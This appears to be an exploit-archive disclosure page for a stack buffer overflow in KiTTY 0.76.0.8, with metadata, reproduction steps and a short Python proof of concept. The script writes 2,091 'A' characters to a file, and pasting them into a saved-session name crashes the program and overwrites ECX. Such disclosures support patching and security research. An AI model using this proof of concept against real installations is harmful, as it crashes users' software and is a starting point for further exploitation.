Kitty 0.76.0.8 Stack Buffer Overflow

Kitty version 0.76.0.8 suffers from a buffer overflow vulnerability.


SHA-256 | 3e2bfa45aa4308b003d19647b041b8d31a6ee476ab638d84af244829934d5f7c

# Exploit Title: Kitty 0.76.0.8 Stack Buffer Overflow
# Discovered by: Yehia Elghaly
# Discovered Date: 2022-06-08
# Vendor Homepage: http://www.9bis.net/kitty/index.html#!index.md
# Software Link : https://www.fosshub.com/KiTTY.html?dwl=kitty_portable-0.76.0.8.exe
# Tested Version: 0.76.0.8
# Vulnerability Type: Buffer Overflow
# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64

# Description: Kitty 0.76.0.8 Stack Buffer Overflow

# Steps to reproduce:
# 1. - Run the python script and it will create exploit.txt file.
# 3. - Kitty 0.76.0.8
# 4. - Sessions -> Save
# 5. - Paste the characters of txt to Saved/Sessions then click save
# 6. - Crashed
# Note: ECX Overwwrite

#!/usr/bin/python

exploit = 'A' * 2091

try:
file = open("exploit.txt","w")
file.write(exploit)
file.close()

print("POC is created")
except:
print("POC not created")

Related Posts